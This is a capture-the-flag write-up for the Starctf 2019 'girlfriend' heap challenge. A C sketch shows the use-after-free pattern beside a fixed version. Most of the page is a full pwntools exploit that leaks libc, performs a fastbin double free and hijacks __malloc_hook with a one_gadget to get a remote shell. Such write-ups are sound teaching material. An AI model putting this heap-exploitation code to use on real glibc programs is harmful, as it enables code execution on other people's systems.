Starctf_2019_girlfriend
<h1>Analysis</h1>
<p><img src="https://pic.imgdb.cn/item/63ad9faf08b683016307daba.png" alt="" /> </p>
<p>The only bug is a use-after-free on the name chunk, and the only place that accepts input is the add function.</p>
<p><img src="https://pic.imgdb.cn/item/63ad9ff608b6830163089618.png" alt="" /> </p>
<p>The structure is easy to work out: each girlfriend allocates one 0x18 chunk. The first 8 bytes hold the pointer to the name chunk, the next 4 bytes hold the name's size, and the last 0xC bytes hold the call input. Because the name size is not restricted, we can allocate an unsorted-bin-sized name chunk, free it, and use the UAF to leak a libc address; then a double free lets us attack <code>__malloc_hook</code>, with <code>__libc_realloc</code> possibly needed to adjust the stack for the one_gadget.</p>
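<p>As an added example that is not part of the write-up, the following C reconstructs the record layout described above and puts the dangling-pointer pattern behind the UAF next to a hardened delete. Field names, the table size and the function bodies are assumptions; the binary's own symbols are not on the page.</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Layout of one record as the write-up describes it: a 0x18-byte chunk with the
 * name pointer at 0x0, the name size at 0x8 and the 12-byte call at 0xC.
 * Field names are assumptions; the binary's symbols are not on the page. */
struct girlfriend {
    char    *name;       /* 0x0: pointer to a separately malloc'ed name chunk */
    uint32_t name_size;  /* 0x8: user-chosen, unbounded (any bin size reachable) */
    char     call[0xC];  /* 0xC: call string, 12 bytes */
};
#define MAX_GF 100
static struct girlfriend *gfs[MAX_GF];  /* records indexed by the menu index */

/* add: one 0x18 record plus one name chunk of the requested size (constructed). */
int add_gf(int idx, uint32_t size, const char *name, const char *call) {
    if (idx < 0 || idx >= MAX_GF || gfs[idx] != NULL || size == 0) return -1;
    struct girlfriend *g = calloc(1, sizeof *g);
    if (!g) return -1;
    g->name = calloc(1, size);
    if (!g->name) { free(g); return -1; }
    g->name_size = size;
    strncpy(g->name, name, size - 1);
    strncpy(g->call, call, sizeof g->call - 1);
    gfs[idx] = g;
    return 0;
}

/* Vulnerable pattern: the name chunk is freed but the record and its pointer stay
 * reachable through the table, so show() reads freed memory and a second call()
 * frees the same chunk again (the UAF / double free the write-up relies on). */
void call_vuln(int idx) {
    if (idx < 0 || idx >= MAX_GF || gfs[idx] == NULL) return;
    free(gfs[idx]->name);
}

/* Hardened pattern: free both allocations and clear the slot, so the freed name
 * is unreachable and a repeated call() on the same index is a no-op. */
void call_fixed(int idx) {
    if (idx < 0 || idx >= MAX_GF || gfs[idx] == NULL) return;
    free(gfs[idx]->name);
    gfs[idx]->name = NULL;
    free(gfs[idx]);
    gfs[idx] = NULL;
}

/* 1 if the slot still points at a record after deletion (dangling reference). */
int slot_dangling(int idx) { return idx >= 0 && idx < MAX_GF && gfs[idx] != NULL; }
```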
<h1>Exploit</h1>
<pre><code>from pwn import *
# context.log_level = 'debug'
# o = process('./pwn')
o = remote('node4.buuoj.cn', 27825)
libc = ELF('./libc-2.23.so')

def add(size, name, call):
    o.sendlineafter(b'Input your choice:', b'1')
    o.sendlineafter(b"Please input the size of girl's name", str(size).encode())
    o.sendlineafter(b'please inpute her name:', name)
    o.sendlineafter(b'please input her call:', call)

def show(index):
    o.sendlineafter(b'Input your choice:', b'2')
    o.sendlineafter(b'Please input the index:', str(index).encode())

def call(index):
    o.sendlineafter(b'Input your choice:', b'4')
    o.sendlineafter(b'Please input the index:', str(index).encode())

add(0x90, b'aaaa', b'11111')  # 0: unsorted-bin-sized name chunk
add(0x60, b'bbbb', b'22222')  # 1: fastbin-sized name chunk
call(0)                       # free name 0 into the unsorted bin
show(0)                       # UAF: the freed chunk's fd (main_arena+0x58) is printed as the name
o.recvuntil(b'name:\n')
malloc_hook = u64(o.recv(6) + b'\x00\x00') - 0x68
log.info(hex(malloc_hook))
libc_base = malloc_hook - libc.sym['__malloc_hook']
log.info("libc_base: %x", libc_base)
libc_realloc = libc_base + libc.sym['__libc_realloc']
one = libc_base + 0xf1147     # one_gadget offset for this libc-2.23
add(0x70, b'cccc', b'123')    # 2
add(0x60, b'cccc', b'33333')  # 3
call(1)                       # fastbin double free: 1 -&gt; 3 -&gt; 1
call(3)
call(1)
add(0x60, p64(malloc_hook - 0x23), b'123')  # chunk 1 comes back; its fd now points at the fake chunk
add(0x60, b'aaaa', b'123')
add(0x60, b'aaaa', b'123')
# the fake chunk at malloc_hook-0x23 is returned: 11 bytes of padding,
# then __realloc_hook = one_gadget, then __malloc_hook = realloc+2
add(0x60, b'a' * 11 + p64(one) + p64(libc_realloc + 2), b'123')
o.sendlineafter(b'Input your choice:', b'1')  # the next malloc() goes through the hooks
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63ada0e208b68301630b0a2f.png" alt="" /></p>